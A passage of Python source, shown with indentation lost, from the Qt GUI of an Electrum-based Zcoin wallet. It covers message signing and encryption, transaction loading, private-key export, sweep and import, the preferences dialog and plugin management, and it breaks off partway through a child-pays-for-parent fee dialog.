def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum_xzc.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum_xzc import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("zcoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum_xzc import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + str(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {str(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
self.show_message(str(e))
return
self.do_clear()
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(addr)
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
tabs.setObjectName("settings_tab")
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum_xzc.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
_('Mempool based: fee rate is targeting a depth in the memory pool')
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', x==2)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf = self.config.get('use_rbf', True)
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(use_rbf)
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', bool(x))
batch_rbf_cb.setEnabled(bool(x))
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
batch_rbf_cb = QCheckBox(_('Batch RBF transactions'))
batch_rbf_cb.setChecked(self.config.get('batch_rbf', False))
batch_rbf_cb.setEnabled(use_rbf)
batch_rbf_cb.setToolTip(
_('If you check this box, your unconfirmed transactions will be consolidated into a single transaction.') + '\n' + \
_('This will save fees.'))
def on_batch_rbf(x):
self.config.set_key('batch_rbf', bool(x))
batch_rbf_cb.stateChanged.connect(on_batch_rbf)
fee_widgets.append((batch_rbf_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = base_units_list
msg = (_('Base unit of your wallet.')
+ '\n1 BTC = 1000 mBTC. 1 mBTC = 1000 bits. 1 bit = 100 sat.\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.decimal_point = base_unit_name_to_decimal_point(unit_result)
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum_xzc import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Light'), 'default')
colortheme_combo.addItem(_('Dark'), 'dark')
index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default'))
colortheme_combo.setCurrentIndex(index)
colortheme_label = QLabel(_('Color theme') + ':')
def on_colortheme(x):
self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
updatecheck_cb = QCheckBox(_("Automatically check for software updates"))
updatecheck_cb.setChecked(self.config.get('check_updates', False))
def on_set_updatecheck(v):
self.config.set_key('check_updates', v == Qt.Checked, save=True)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
filelogging_cb = QCheckBox(_("Write logs to file"))
filelogging_cb.setChecked(bool(self.config.get('log_to_file', False)))
def on_set_filelogging(v):
self.config.set_key('log_to_file', v == Qt.Checked, save=True)
self.need_restart = True
filelogging_cb.stateChanged.connect(on_set_filelogging)
filelogging_cb.setToolTip(_('Debug logs can be persisted to disk. These are useful for troubleshooting.'))
gui_widgets.append((filelogging_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.blockSignals(True)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
ex_combo.blockSignals(False)
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_model.refresh('on_history')
if self.fx.is_enabled() and checked:
self.fx.trigger_update()
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_model.refresh('on_history_capgains')
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('General')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.trigger_update()
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.network.unregister_callback(self.on_quotes)
self.network.unregister_callback(self.on_history)
self.wallet.protx_manager.clean_up()
self.network.dash_net.unregister_callback(self.on_dash_net)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_fee = self.wallet.get_tx_fee(parent_tx)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
